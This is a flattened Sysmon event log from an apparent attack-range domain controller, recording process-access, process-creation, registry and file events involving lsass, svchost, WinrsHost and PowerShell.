13:33:12.574{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.574{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.574{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.559{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.559{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.559{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.559{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.559{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.573{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8CA8-6005-0C00-00000000A201}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.184{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.184{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.184{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.106{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.106{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.106{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
13241300x800000000000000093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:13.168{59A5CD1D-8CA9-6005-1100-00000000A201}1184C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9e-0x7839f7dc) 10341000x8000000000000000114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.950{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:14.950{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.903{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qnuiti4x.r3v.ps12021-01-18 13:33:14.903 10341000x8000000000000000111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:14.887{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 